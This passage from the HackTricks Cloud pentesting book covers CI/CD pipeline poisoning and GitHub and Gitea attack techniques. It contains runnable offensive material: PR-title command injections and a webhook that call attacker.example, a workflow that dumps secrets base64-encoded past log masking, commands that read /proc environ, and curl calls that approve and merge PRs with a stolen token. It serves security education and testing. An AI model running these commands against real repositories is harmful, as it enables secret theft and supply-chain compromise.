HackTricks Cloud
Welcome!
HackTricks Cloud 1.1
About the Author 1.2
Pentesting CI/CD
Pentesting CI/CD Methodology 2.1
Github Security 2.2
Basic Github Information 2.2.1
Gitea Security 2.3
Basic Gitea Information 2.3.1
Concourse Security 2.4
Concourse Architecture 2.4.1
Concourse Lab Creation 2.4.2
Concourse Enumeration & Attacks 2.4.3
CircleCI Security 2.5
TravisCI Security 2.6
Basic TravisCI Information 2.6.1
Jenkins Security 2.7
Basic Jenkins Information 2.7.1
Jenkins RCE with Groovy Script 2.7.2
Jenkins RCE Creating/Modifying Project 2.7.3
Jenkins RCE Creating/Modifying Pipeline 2.7.4
Jenkins Dumping Secrets from Groovy 2.7.5
SCM IP Whitelisting Bypass 2.7.6
Apache Airflow Security 2.8
Airflow Configuration 2.8.1
Airflow RBAC 2.8.2
Terraform Security 2.9
Terraform Enterprise Security 2.9.1
Atlantis Security 2.10
Cloudflare Security 2.11
Cloudflare Domains 2.11.1
Cloudflare Zero Trust Network 2.11.2
TODO 2.12
Pentesting Cloud
Pentesting Cloud Methodology 3.1
Kubernetes Pentesting 3.2
Kubernetes Basics 3.2.1
Pentesting Kubernetes Services 3.2.2
Kubelet Authentication & Authorization 3.2.2.1
Exposing Services in Kubernetes 3.2.3
Attacking Kubernetes from inside a Pod 3.2.4
Kubernetes Enumeration 3.2.5
Kubernetes Role-Based Access Control (RBAC) 3.2.6
Abusing Roles/ClusterRoles in Kubernetes 3.2.7
Pod Escape Privileges 3.2.7.1
Kubernetes Roles Abuse Lab 3.2.7.2
Kubernetes Namespace Escalation 3.2.8
Kubernetes Pivoting to Clouds 3.2.9
Kubernetes Network Attacks 3.2.10
Kubernetes Hardening 3.2.11
Kubernetes NetworkPolicies 3.2.11.1
Kubernetes SecurityContext(s) 3.2.11.2
Monitoring with Falco 3.2.11.3
GCP Pentesting 3.3
GCP - Basic Information 3.3.1
GCP - Federation Abuse 3.3.1.1
GCP - Non-svc Persistence 3.3.2
GCP - Permissions for a Pentest 3.3.3
GCP - Privilege Escalation 3.3.4
GCP - Apikeys Privesc 3.3.4.1
GCP - Cloudbuild Privesc 3.3.4.2
GCP - Cloudfunctions Privesc 3.3.4.3
GCP - Cloudscheduler Privesc 3.3.4.4
GCP - Compute Privesc 3.3.4.5
GCP - Composer Privesc 3.3.4.6
GCP - Container Privesc 3.3.4.7
GCP - Deploymentmanager Privesc 3.3.4.8
GCP - IAM Privesc 3.3.4.9
GCP - KMS Privesc 3.3.4.10
GCP - Orgpolicy Privesc 3.3.4.11
GCP - Resourcemanager Privesc 3.3.4.12
GCP - Run Privesc 3.3.4.13
GCP - Secretmanager Privesc 3.3.4.14
GCP - Serviceusage Privesc 3.3.4.15
GCP - Storage Privesc 3.3.4.16
GCP - Misc Perms Privesc 3.3.4.17
GCP - Network Docker Escape 3.3.4.18
GCP - local privilege escalation ssh pivoting 3.3.4.19
GCP - Services 3.3.5
GCP - AI Platform Enum 3.3.5.1
GCP - Cloud Functions, App Engine & Cloud Run Enum 3.3.5.2
GCP - Compute Instances Enum 3.3.5.3
GCP - Compute Network Enum 3.3.5.4
GCP - Compute OS-Config Enum 3.3.5.5
GCP - Containers, GKE & Composer Enum 3.3.5.6
GCP - Databases Enum 3.3.5.7
GCP - Bigquery Enum 3.3.5.7.1
GCP - Bigtable Enum 3.3.5.7.2
GCP - Firebase Enum 3.3.5.7.3
GCP - Firestore Enum 3.3.5.7.4
GCP - Memorystore Enum 3.3.5.7.5
GCP - Spanner Enum 3.3.5.7.6
GCP - SQL Enum 3.3.5.7.7
GCP - DNS Enum 3.3.5.8
GCP - Filestore Enum 3.3.5.9
GCP - IAM & Org Policies Enum 3.3.5.10
GCP - KMS and Secrets Management Enum 3.3.5.11
GCP - Pub/Sub 3.3.5.12
GCP - Source Repositories Enum 3.3.5.13
GCP - Stackdriver Enum 3.3.5.14
GCP - Storage Enum 3.3.5.15
GCP - Unauthenticated Enum 3.3.6
GCP - Public Buckets Privilege Escalation 3.3.6.1
Workspace Pentesting 3.4
AWS Pentesting 3.5
AWS - Basic Information 3.5.1
AWS - Federation Abuse 3.5.1.1
Assume Role & Confused Deputy 3.5.1.2
AWS - Permissions for a Pentest 3.5.2
AWS - Persistence 3.5.3
AWS - Privilege Escalation 3.5.4
AWS - Apigateway Privesc 3.5.4.1
AWS - Codebuild Privesc 3.5.4.2
AWS - Codepipeline Privesc 3.5.4.3
AWS - Codestar Privesc 3.5.4.4
codestar:CreateProject, codestar:AssociateTeamMember 3.5.4.4.1
iam:PassRole, codestar:CreateProject 3.5.4.4.2
AWS - Cloudformation Privesc 3.5.4.5
iam:PassRole, cloudformation:CreateStack, and cloudformation:DescribeStacks 3.5.4.5.1
AWS - Cognito Privesc 3.5.4.6
AWS - Datapipeline Privesc 3.5.4.7
AWS - Directory Services Privesc 3.5.4.8
AWS - DynamoDB Privesc 3.5.4.9
AWS - EBS Privesc 3.5.4.10
AWS - EC2 Privesc 3.5.4.11
AWS - ECR Privesc 3.5.4.12
AWS - ECS Privesc 3.5.4.13
AWS - EFS Privesc 3.5.4.14
AWS - Elastic Beanstalk Privesc 3.5.4.15
AWS - EMR Privesc 3.5.4.16
AWS - Glue Privesc 3.5.4.17
AWS - IAM Privesc 3.5.4.18
AWS - KMS Privesc 3.5.4.19
AWS - Lambda Privesc 3.5.4.20
AWS - Steal Lambda Requests 3.5.4.20.1
AWS - Lightsail Privesc 3.5.4.21
AWS - MQ Privesc 3.5.4.22
AWS - MSK Privesc 3.5.4.23
AWS - RDS Privesc 3.5.4.24
AWS - Redshift Privesc 3.5.4.25
AWS - S3 Privesc 3.5.4.26
AWS - Sagemaker Privesc 3.5.4.27
AWS - Secrets Manager Privesc 3.5.4.28
AWS - SSM Privesc 3.5.4.29
AWS - STS Privesc 3.5.4.30
AWS - WorkDocs Privesc 3.5.4.31
AWS - Misc Privesc 3.5.4.32
route53:CreateHostedZone, route53:ChangeResourceRecordSets, acm-pca:IssueCertificate, acm-pca:GetCertificate 3.5.4.32.1
AWS - Services 3.5.5
AWS - Security & Detection Services 3.5.5.1
AWS - CloudTrail Enum 3.5.5.1.1
AWS - CloudWatch Enum 3.5.5.1.2
AWS - Config Enum 3.5.5.1.3
AWS - Cost Explorer Enum 3.5.5.1.4
AWS - Detective Enum 3.5.5.1.5
AWS - Firewall Manager Enum 3.5.5.1.6
AWS - GuardDuty Enum 3.5.5.1.7
AWS - Inspector Enum 3.5.5.1.8
AWS - Macie Enum 3.5.5.1.9
AWS - Security Hub Enum 3.5.5.1.10
AWS - Shield Enum 3.5.5.1.11
AWS - Trusted Advisor Enum 3.5.5.1.12
AWS - WAF Enum 3.5.5.1.13
AWS - Databases 3.5.5.2
AWS - DynamoDB Enum 3.5.5.2.1
AWS - Redshift Enum 3.5.5.2.2
AWS - DocumentDB Enum 3.5.5.2.3
AWS - Relational Database (RDS) Enum 3.5.5.2.4
AWS - API Gateway Enum 3.5.5.3
AWS - CloudFormation & Codestar Enum 3.5.5.4
AWS - CloudHSM Enum 3.5.5.5
AWS - CloudFront Enum 3.5.5.6
AWS - Cognito Enum 3.5.5.7
Cognito Identity Pools 3.5.5.7.1
Cognito User Pools 3.5.5.7.2
AWS - DataPipeline, CodePipeline, CodeBuild & CodeCommit 3.5.5.8
AWS - Directory Services / WorkDocs 3.5.5.9
AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum 3.5.5.10
AWS - VPCs-Network-Subnetworks-Ifaces-SecGroups-NAT 3.5.5.10.1
AWS - SSM Post-Exploitation 3.5.5.10.2
AWS - Malicious VPC Mirror 3.5.5.10.3
AWS - ECS, ECR & EKS Enum 3.5.5.11
AWS - Elastic Beanstalk Enum 3.5.5.12
AWS - EMR Enum 3.5.5.13
AWS - EFS Enum 3.5.5.14
AWS - Kinesis Data Firehose 3.5.5.15
AWS - IAM & STS Enum 3.5.5.16
AWS - Confused deputy 3.5.5.16.1
AWS - KMS Enum 3.5.5.17
AWS - Lambda Enum 3.5.5.18
AWS - Lightsail Enum 3.5.5.19
AWS - MQ Enum 3.5.5.20
AWS - MSK Enum 3.5.5.21
AWS - Route53 Enum 3.5.5.22
AWS - Secrets Manager Enum 3.5.5.23
AWS - SQS & SNS Enum 3.5.5.24
AWS - S3, Athena & Glacier Enum 3.5.5.25
S3 Ransomware 3.5.5.25.1
AWS - Other Services Enum 3.5.5.26
AWS - Unauthenticated Enum & Access 3.5.6
AWS - Accounts Unauthenticated Enum 3.5.6.1
AWS - Api Gateway Unauthenticated Enum 3.5.6.2
AWS - Cloudfront Unauthenticated Enum 3.5.6.3
AWS - Cognito Unauthenticated Enum 3.5.6.4
AWS - DocumentDB Unauthenticated Enum 3.5.6.5
AWS - EC2 Unauthenticated Enum 3.5.6.6
AWS - Elasticsearch Unauthenticated Enum 3.5.6.7
AWS - IAM Unauthenticated Enum 3.5.6.8
AWS - IoT Unauthenticated Enum 3.5.6.9
AWS - Kinesis Video Unauthenticated Enum 3.5.6.10
AWS - Lambda Unauthenticated Access 3.5.6.11
AWS - Media Unauthenticated Enum 3.5.6.12
AWS - MQ Unauthenticated Enum 3.5.6.13
AWS - MSK Unauthenticated Enum 3.5.6.14
AWS - RDS Unauthenticated Enum 3.5.6.15
AWS - Redshift Unauthenticated Enum 3.5.6.16
AWS - SQS Unauthenticated Enum 3.5.6.17
AWS - S3 Unauthenticated Enum 3.5.6.18
Azure Pentesting 3.6
Az - Basic Information 3.6.1
Az - Unauthenticated Enum & Initial Entry 3.6.2
Az - Illicit Consent Grant 3.6.2.1
Az - Device Code Authentication Phishing 3.6.2.2
Az - Password Spraying 3.6.2.3
Az - Services 3.6.3
Az - Application Proxy 3.6.3.1
Az - ARM Templates / Deployments 3.6.3.2
Az - Automation Account 3.6.3.3
Az - State Configuration RCE 3.6.3.3.1
Az - AzureAD 3.6.3.4
Az - Azure App Service & Function Apps 3.6.3.5
Az - Blob Storage 3.6.3.6
Az - Intune 3.6.3.7
Az - Keyvault 3.6.3.8
Az - Virtual Machines 3.6.3.9
Az - Permissions for a Pentest 3.6.4
Az - Lateral Movement (Cloud - On-Prem) 3.6.5
Az - Pass the Cookie 3.6.5.1
Az - Pass the PRT 3.6.5.2
Az - Pass the Certificate 3.6.5.3
Az - Local Cloud Credentials 3.6.5.4
Azure AD Connect - Hybrid Identity 3.6.5.5
Federation 3.6.5.5.1
PHS - Password Hash Sync 3.6.5.5.2
PTA - Pass-through Authentication 3.6.5.5.3
Seamless SSO 3.6.5.5.4
Az - Persistence 3.6.6
Az - Dynamic Groups Privesc 3.6.7
Digital Ocean Pentesting 3.7
DO - Basic Information 3.7.1
DO - Permissions for a Pentest 3.7.2
DO - Services 3.7.3
DO - Apps 3.7.3.1
DO - Container Registry 3.7.3.2
DO - Databases 3.7.3.3
DO - Droplets 3.7.3.4
DO - Functions 3.7.3.5
DO - Images 3.7.3.6
DO - Kubernetes (DOKS) 3.7.3.7
DO - Networking 3.7.3.8
DO - Projects 3.7.3.9
DO - Spaces 3.7.3.10
DO - Volumes 3.7.3.11
Pentesting Network Services
HackTricks Pentesting Network 4.1
HackTricks Pentesting Services 4.2
HackTricks Cloud
Welcome to the page where you will find each hacking trick/technique/whatever related to CI/CD & Cloud that I have learnt in CTFs, real-life environments, and by reading research and news.
Pentesting CI/CD Methodology
In the HackTricks CI/CD Methodology you will find how to pentest
infrastructure related to CI/CD activities. Read the following page for an
introduction:
pentesting-ci-cd-methodology.md
Pentesting Cloud Methodology
In the HackTricks Cloud Methodology you will find how to pentest
cloud environments. Read the following page for an introduction:
pentesting-cloud-methodology.md
License
Copyright © Carlos Polop 2022. Except where otherwise specified (the external information copied into the book belongs to the original authors), the text on HackTricks Cloud by Carlos Polop is licensed under the Attribution-NonCommercial 4.0 International (CC BY-NC 4.0). If you want to use it for commercial purposes, contact me.
VCS
VCS stands for Version Control System, this systems allows developers to
manage their source code. The most common one is git and you will
usually find companies using it in one of the following platforms:
Github
Gitlab
Bitbucket
Gitea
Cloud providers (they offer their own VCS platforms)
Pipelines
Pipelines allow developers to automate the execution of code (for building, testing, deploying... purposes) after certain actions occur: a push, a PR, a cron schedule... They are terribly useful to automate all the steps from development to production.
Platforms that contain the source code of your project contain sensitive information, and people need to be very careful with the permissions granted inside these platforms. These are some common problems across VCS platforms that an attacker could abuse:
Leaks: If your code contains leaks in the commits and the attacker can
access the repo (because it's public or because he has access), he could
discover the leaks.
Access: If an attacker can access an account inside the VCS platform, he could gain more visibility and permissions.
Register: Some platforms will just allow external users to create
an account.
SSO: Some platforms won't allow users to register, but will allow anyone to access with a valid SSO (so an attacker could use his github account to enter, for example).
Credentials: Username+password, personal tokens, SSH keys, OAuth tokens, cookies... there are several kinds of tokens a user could steal to access a repo in some way.
Webhooks: VCS platforms allow generating webhooks. If they are not protected with non-visible secrets, an attacker could abuse them.
If no secret is in place, the attacker could abuse the webhook of the third-party platform.
If the secret is in the URL, the same happens and the attacker also has the secret.
Code compromise: If a malicious actor has some kind of write access over the repos, he could try to inject malicious code. In order to be successful he might need to bypass branch protections. These actions can be performed with different goals in mind:
Compromise the main branch to compromise production.
Compromise the main branch (or other branches) to compromise developers' machines (as they usually execute tests, terraform or other things inside the repo on their machines).
Compromise the pipeline (check the next section).
Pipelines Pentesting Methodology
The most common way to define a pipeline, is by using a CI configuration
file hosted in the repository the pipeline builds. This file describes the
order of executed jobs, conditions that affect the flow, and build
environment settings.\ These files typically have a consistent name and
format, for example — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab),
.circleci/config.yml (CircleCI), and the GitHub Actions YAML files located
under .github/workflows. When triggered, the pipeline job pulls the code
from the selected source (e.g. commit / branch), and runs the commands
specified in the CI configuration file against that code.
D-PPE: A Direct PPE attack occurs when the actor modifies the CI
config file that is going to be executed.
I-PPE: An Indirect PPE attack occurs when the actor modifies a file that the CI config file to be executed relies on (like a Makefile or a Terraform config).
Public PPE or 3PE: In some cases the pipelines can be triggered by users that don't have write access to the repo (and that might not even be part of the org) because they can send a PR.
3PE Command Injection: Usually, CI/CD pipelines will set
environment variables with information about the PR. If that
value can be controlled by an attacker (like the title of the PR)
and is used in a dangerous place (like executing sh commands),
an attacker might inject commands in there.
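As a minimal sketch of how such an injection works (the variable name, URL and wiring are made up for illustration), consider a runner step that expands an attacker-controlled PR title inside a shell command:

# PR_TITLE is assumed to be filled by the CI from the pull request title (attacker-controlled)
PR_TITLE='a"; curl https://attacker.example/$(whoami); echo "'
# A step that naively interpolates it into a shell command ends up running the injected curl
bash -c "echo \"PR title: $PR_TITLE\""

Therefore, untrusted values should only reach scripts via environment variables and be quoted, never interpolated directly into the command string.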
Exploitation Benefits
Knowing the 3 flavours to poison a pipeline, let's check what an attacker could obtain after a successful exploitation:
Secrets: As mentioned previously, pipelines require privileges for their jobs (retrieve the code, build it, deploy it...) and these privileges are usually granted in secrets. These secrets are usually accessible via env variables or files inside the system. Therefore an attacker will always try to exfiltrate as many secrets as possible.
Depending on the pipeline platform, the attacker might need to specify the secrets in the config. This means that if the attacker cannot modify the CI configuration pipeline (in I-PPE for example), he could only exfiltrate the secrets that pipeline already has.
Computation: The code is executed somewhere; depending on where it is executed, an attacker might be able to pivot further.
On-Premises: If the pipelines are executed on premises, an attacker might end up in an internal network with access to more resources.
Cloud: The attacker could access other machines in the cloud, but could also exfiltrate IAM roles/service account tokens from it to obtain further access inside the cloud.
Platform's machines: Sometimes the jobs will be executed inside the pipeline platform's machines, which usually are inside a cloud with no more access.
Select it: Sometimes the pipeline platform will have several machines configured, and if you can modify the CI configuration file you can indicate where you want to run the malicious code. In this situation, an attacker will probably run a reverse shell on each possible machine to try to exploit it further.
Compromise production: If you are inside the pipeline and the final version is built and deployed from it, you could compromise the code that is going to end up running in production.
More relevant info
Tools & CIS Benchmark
Chain-bench is an open-source tool for auditing your software supply
chain stack for security compliance based on a new CIS Software
Supply Chain benchmark. The auditing focuses on the entire SDLC
process, where it can reveal risks from code time into deploy time.
Labs
For each platform that you can run locally, you will find how to launch it locally so you can configure it as you want in order to test it.
Gitea + Jenkins lab: https://github.com/cider-security-research/cicd-goat
Automatic Tools
Checkov: Checkov is a static code analysis tool for infrastructure-as-
code.
References
https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github&utm_medium=github_page&utm_campaign=ci%2fcd%20goat_060422
Basic Information
basic-github-information.md
External Recon
Github repositories can be configured as public, private and internal.
In case you know the user, repo or organisation you want to target you
can use github dorks to find sensitive information or search for sensitive
information leaks on each repo.
Github Dorks
Github allows to search for something specifying as scope a user, a repo
or an organisation. Therefore, with a list of strings that are going to appear
close to sensitive information you can easily search for potential sensitive
information in your target.
https://github.com/zricethezav/gitleaks
https://github.com/trufflesecurity/truffleHog
https://github.com/eth0izzle/shhgit
https://github.com/michenriksen/gitrob
https://github.com/anshumanbh/git-all-secrets
https://github.com/kootenpv/gittyleaks
https://github.com/awslabs/git-secrets
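As a quick, hedged example, the scanners above can be pointed at a cloned repo or at a whole org (flag names from gitleaks v8 and trufflehog v3, check the versions you have installed):

# Scan a locally cloned repo for hardcoded secrets (gitleaks v8)
git clone https://github.com/<org_name>/<repo_name> && cd <repo_name>
gitleaks detect --source . -v --report-path /tmp/leaks.json

# Scan a whole GitHub org remotely (trufflehog v3)
trufflehog github --org=<org_name> --only-verified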
External Forks
It's possible to compromise repos abusing pull requests. To know if a
repo is vulnerable you mostly need to read the Github Actions yaml
configs. More info about this below.
Organization Hardening
Member Privileges
There are some default privileges that can be assigned to members of the organization. These can be controlled from the page https://github.com/organizations/<org_name>/settings/member_privileges.
Actions Settings
Several security-related settings can be configured for actions from the page https://github.com/organizations/<org_name>/settings/actions.
Note that all these configurations can also be set on each repository independently.
Integrations
Let me know if you know the API endpoint to access this info!
Note that 2FA may be used so you will only be able to access this
information if you can also pass that check.
Check the section below about branch protections bypasses in case it's
useful.
If the user has configured its username as his github username, you can access the public keys he has set in his account in https://github.com/<username>.keys; you could check this to confirm that the private key you found can be used.
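A quick way to do that check is to derive the public key from the private key you found and compare it with the exposed ones (the file name is just an example):

# Public keys exposed by Github for a user
curl https://github.com/<username>.keys
# Derive the public key from a found private key and compare
ssh-keygen -y -f ./found_id_rsa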
SSH keys can also be set in repositories as deploy keys. Anyone with access to this key will be able to launch projects from a repository. Usually in a server with different deploy keys, the local file ~/.ssh/config will give you information about which key is related to which repo.
GPG Keys
As explained here, it's sometimes needed to sign the commits, or you might get discovered.
A user token can be used instead of a password for Git over HTTPS, or
can be used to authenticate to the API over Basic Authentication.
Depending on the privileges attached to it you might be able to perform
different actions.
These are the scopes an Oauth application can request. A user should always check the scopes requested before accepting them.
In case you can execute arbitrary github actions in a repository, you can
steal the secrets from that repo.
pull_request
pull_request_target
It might look like, because the executed workflow is the one defined in the base and not in the PR, it's secure to use pull_request_target, but there are a few cases where it isn't.
jobs:
  build:
    name: Build and test
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v2
      with:
        ref: ${{ github.event.pull_request.head.sha }}
    - uses: actions/setup-node@v1
    - run: |
        npm install
        npm build
    - uses: completely/fakeaction@v2
      with:
        arg1: ${{ secrets.supersecret }}
    - uses: fakerepo/comment-on-pr@v1
      with:
        message: |
          Thank you!
The potentially untrusted code is being run during npm install or npm
build as the build scripts and referenced packages are controlled by the
author of the PR.
cat /proc/<proc_number>/environ
cat /proc/*/environ | grep -i secret # Supposing the env variable name contains "secret"
aws-federation-abuse.md
gcp-federation-abuse.md
GITHUB_TOKEN
This "secret" (coming from ${ { secrets.GITHUB_TOKEN }} and ${ {
Note that the token expires after the job has completed.\ These tokens
looks like this: ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7
https://api.github.com/repos/<org_name>/<repo_name>/pulls/<pr_n
umber>/merge
-H "Accept: application/vnd.github.v3+json" \
--header "authorization: Bearer $GITHUB_TOKEN" \
--header 'content-type: application/json' \
-d '{"commit_title":"commit_title"}'
# Approve a PR
curl -X POST \
  https://api.github.com/repos/<org_name>/<repo_name>/pulls/<pr_number>/reviews \
  -H "Accept: application/vnd.github.v3+json" \
  --header "authorization: Bearer $GITHUB_TOKEN" \
  --header 'content-type: application/json' \
  -d '{"event":"APPROVE"}'

# Create a PR
curl -X POST \
  -H "Accept: application/vnd.github.v3+json" \
  --header "authorization: Bearer $GITHUB_TOKEN" \
  --header 'content-type: application/json' \
  https://api.github.com/repos/<org_name>/<repo_name>/pulls \
  -d '{"head":"<branch_name>","base":"master","title":"title"}'
Note that on several occasions you will be able to find github user tokens inside Github Actions envs or in the secrets. These tokens may give you more privileges over the repository and organization.
List secrets in Github Action output
name: list_env
on:
  workflow_dispatch: # Launch manually
  pull_request: # Run it when a PR is created to a branch
    branches:
      - '**'
  push: # Run it when a push is made to a branch
    branches:
      - '**'

jobs:
  List_env:
    runs-on: ubuntu-latest
    steps:
      - name: List Env
        # Need to base64 encode or github will change the secret value for "***"
        run: sh -c 'env | grep "secret_" | base64 -w0'
        env:
          secret_myql_pass: ${{ secrets.MYSQL_PASSWORD }}
          secret_postgress_pass: ${{ secrets.POSTGRESS_PASSWORD }}
Script Injections
Note that there are certain github contexts whose values are controlled by the user creating the PR. If the github action is using that data to execute anything, it could lead to arbitrary code execution. These contexts typically end with body, default_branch, email, head_ref, label, message, name, page_name, ref, and title. For example (list from this writeup: https://medium.com/tinder/exploiting-github-actions-on-open-source-projects-5d93936d189f):
github.event.comment.body
github.event.issue.body
github.event.issue.title
github.head_ref
github.pull_request.*
github.*.*.authors.name
github.*.*.authors.email
Note that there are less obvious sources of potentially untrusted input, such as branch names and email addresses, which can be quite flexible in terms of their permitted content. For example, zzz";echo${IFS}"hello";# would be a valid branch name and would be a possible attack vector for a target repository.
To inject commands into such a workflow, the attacker could create a pull request with a title of a"; ls $GITHUB_WORKSPACE", making the ls command be executed on the runner (you can then see the output of the ls command in the workflow logs).
uses: fakeaction/publish@v3
with:
  key: ${{ secrets.PUBLISH_KEY }}
Cache Poisoning
Using the actions/cache action anywhere in the CI will run two steps: one step will take place during the run process when it's called, and the other will take place post workflow (if the run action returned a cache-miss).
Run action – is used to search and retrieve the cache. The search is
done using the cache key, with the result being either a cache-hit
(success, data found in cache) or cache-miss. If found, the files and
directories are retrieved from the cache for active use. If the result is
cache-miss, the desired files and directories are downloaded as if it
was the first time they are called.
Post workflow action – used for saving the cache. If the result of the
cache call in the run action returns a cache-miss, this action will save
the current state of the directories we want to cache with the provided
key. This action happens automatically and doesn’t need to be
explicitly called.
Access restrictions provide cache isolation and security by creating a
logical boundary between different branches (for example: a cache
created for the branch Feature-A [with the base main] would not be
accessible to a pull request for the branch Feature-B [with the base main]).
The cache action first searches cache hits for a key and restores keys in the
branch containing the workflow run. If there are no hits in the current
branch, the cache action searches for the key and restores keys in the parent
branch and upstream branches.
Another important note is that GitHub does not allow modifications once
entries are pushed – cache entries are read-only records.
The unit-test workflow uses a malicious action that adds a cache entry with
malicious content by changing a Golang logging library
(go.uber.org/zap@v1) to add the string, ‘BAD library’ to the application
artifact description.
Next, the release workflow uses this poisoned cache entry. As a result, the
malicious code is injected into the built Golang binary and image. The
cache remains poisoned until the entry key is discarded (usually triggered
by dependency updates). The same poisoned cache will affect any other
workflow, run, and child branch using the same cache key.
This was in version 0.4.1. Next, we updated the tag and rebuilt the image
several times, and observed that ‘Bad library’ remained in the description.
Artifact Poisoning
There are several Github Actions that allows to download artifacts from
other repositories. These other repositories will usually have a Gihub
Action to upload the artifact that will be later be downloaded.\ If the
Github Action of the repo that uploads the artifact allows the
pull_request or pull_request_target (using the attackers code), an
attacker will be able to trigger the Action that will upload an Artifact
created from his code, so then any other repo downloading and executing
the latest artifact will be compromised.
For more info and defence options (such as hardcoding the artifact to
download) check https://www.legitsecurity.com/blog/artifact-poisoning-
vulnerability-discovered-in-rust
In case an environment can be accessed from all the branches, it isn't protected and you can easily access the secrets inside the environment.
Note that you might find repos where all the branches are protected (by specifying their names or by using *); in that scenario, find a branch where you can push code and you can exfiltrate the secrets by creating a new github action (or modifying one).
Note that you might find the edge case where all the branches are protected (via wildcard *), it's specified who can push code to the branches (you can specify that in the branch protection) and your user isn't allowed. You can still run a custom github action, because you can create a branch and use the push trigger over itself. The branch protection allows the push to a new branch, so the github action will be triggered. Note that after the creation of the branch the branch protection will apply to the new branch and you won't be able to modify it, but by that time you will have already dumped the secrets.
Persistence
Generate user token
Steal github tokens from secrets
Deletion of workflow results and branches
Give more permissions to all the org
Create webhooks to exfiltrate information (see the sketch after this list)
Invite outside collaborators
Remove webhooks used by the SIEM
Create/modify Github Action with a backdoor
Find vulnerable Github Action to command injection via secret
value modification
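As a sketch of the webhook idea (the endpoint is the standard GitHub REST API; the receiving URL is a made-up attacker server), a token with admin rights over a repo can register a hook that forwards events externally:

# Register a webhook that sends push/PR events to an attacker-controlled server
curl -X POST \
  -H "Accept: application/vnd.github.v3+json" \
  -H "Authorization: Bearer $GITHUB_TOKEN" \
  https://api.github.com/repos/<org_name>/<repo_name>/hooks \
  -d '{"name":"web","active":true,"events":["push","pull_request"],"config":{"url":"https://attacker.example/hook","content_type":"json"}}'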
Organization Roles
In an organisation users can have different roles:
Members Privileges
In https://github.com/organizations/<org_name>/settings/member_privileges you can see the permissions users will have just for being part of the organisation.
Repository Roles
By default the following repository roles are created: Read, Triage, Write, Maintain, Admin.
Teams
You can list the teams created in an organization in https://github.com/orgs/<org_name>/teams. Note that to see the teams which are children of other teams you need to access each parent team.
Users
The users of an organization can be listed in https://github.com/orgs/<org_name>/people.
In the information of each user you can see the teams the user is member
of, and the repos the user has access to.
Github Authentication
Github offers different ways to authenticate to your account and perform
actions on your behalf.
Web Access
Accessing github.com you can log in using your username and password (and potentially a 2FA).
SSH Keys
You can configure your account with one or several public keys allowing
the related private key to perform actions on your behalf.
https://github.com/settings/keys
GPG Keys
You cannot impersonate the user with these keys, but if you don't use them it might be possible that you get discovered for sending commits without a signature. Learn more about vigilant mode here.
Oauth Applications
Oauth applications may ask you for permissions to access part of your
github information or to impersonate you to perform some actions. A
common example of this functionality is the login with github button you
might find in some platforms.
Github Applications
Github applications can ask for permissions to access your github
information or impersonate you to perform specific actions over specific
resources. In Github Apps you need to specify the repositories the app will
have access to.
Github Actions
This isn't a way to authenticate in github, but a malicious Github Action could get unauthorised access to github and, depending on the privileges given to the Action, several different attacks could be done. See below for more information.
Git Actions
Git actions allow automating the execution of code when an event happens. Usually the code executed is somehow related to the code of the repository (maybe building a docker container or checking that the PR doesn't contain secrets).
Configuration
In https://github.com/organizations/<org_name>/settings/actions it's possible to check the configuration of the github actions for the organization.
It's possible to disallow the use of github actions completely, allow all github actions, or just allow certain actions.
It's also possible to configure who needs approval to run a Github Action
and the permissions of the GITHUB_TOKEN of a Github Action when
it's run.
Git Secrets
Github Actions usually need some kind of secrets to interact with github or third party applications. To avoid putting them in clear-text in the repo, github allows putting them in as Secrets.
These secrets can be configured for the repo or for all the organization.
Then, in order for the Action to be able to access the secret you need to
declare it like:
steps:
  - name: Hello world action
    with: # Set the secret as an input
      super_secret: ${{ secrets.SuperSecret }}
    env: # Or as an environment variable
      super_secret: ${{ secrets.SuperSecret }}

steps:
  - shell: bash
    env:
      SUPER_SECRET: ${{ secrets.SuperSecret }}
    run: |
      example-command "$SUPER_SECRET"
Secrets can only be accessed from the Github Actions that have them
declared.
Therefore, the only way to steal github secrets is to be able to access the
machine that is executing the Github Action (in that scenario you will be
able to access only the secrets declared for the Action).
Git Environments
Github allows creating environments where you can save secrets. Then, you can give the github action access to the secrets inside the environment with something like:

jobs:
  deployment:
    runs-on: ubuntu-latest
    environment: env_name
You can require a PR before merging (so you cannot directly merge code over the branch). If this is selected, different other protections can be in place:
Require a number of approvals. It's very common to require 1 or 2 more people to approve your PR, so a single user isn't capable of merging code directly.
Dismiss approvals when new commits are pushed. If not, a user may approve legit code and then add malicious code and merge it.
Require reviews from Code Owners. At least 1 code owner of
the repo needs to approve the PR (so "random" users cannot
approve it)
Restrict who can dismiss pull request reviews. You can specify
people or teams allowed to dismiss pull request reviews.
Allow specified actors to bypass pull request requirements.
These users will be able to bypass previous restrictions.
Require status checks to pass before merging. Some checks needs to
pass before being able to merge the commit (like a github action
checking there isn't any cleartext secret).
Require conversation resolution before merging. All comments on
the code needs to be resolved before the PR can be merged.
Require signed commits. The commits need to be signed.
Require linear history. Prevent merge commits from being pushed to
matching branches.
Include administrators. If this isn't set, admins can bypass the
restrictions.
Restrict who can push to matching branches. Restrict who can send
a PR.
As you can see, even if you managed to obtain some credentials of a user, repos might be protected, preventing you from pushing code to master, for example, to compromise the CI/CD pipeline.
References
https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization
https://docs.github.com/en/enterprise-server@<version>/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise
https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github
https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards
https://docs.github.com/en/actions/security-guides/encrypted-secrets
Basic Information
basic-gitea-information.md
Lab
To run a Gitea instance locally you can just run a docker container:
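A minimal sketch using the official gitea/gitea image (3000 is the web UI port and 22 the SSH port inside the container):

docker run --rm -d --name gitea -p 3000:3000 -p 2222:22 gitea/gitea:latest
# Then browse to http://localhost:3000, finish the initial setup and register a user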
Note that by default Gitea allows new users to register. This won't give especially interesting access to the new users over other organizations'/users' repos, but a logged-in user might be able to visualize more repos or organizations.
Internal Exploitation
For this scenario we are going to suppose that you have obtained some access to a gitea account.
Note that 2FA may be used so you will only be able to access this
information if you can also pass that check.
With this key you can perform changes in repositories where the user has some privileges; however, you cannot use it to access the gitea api to enumerate the environment. However, you can enumerate local settings to get information about the repos and users you have access to:
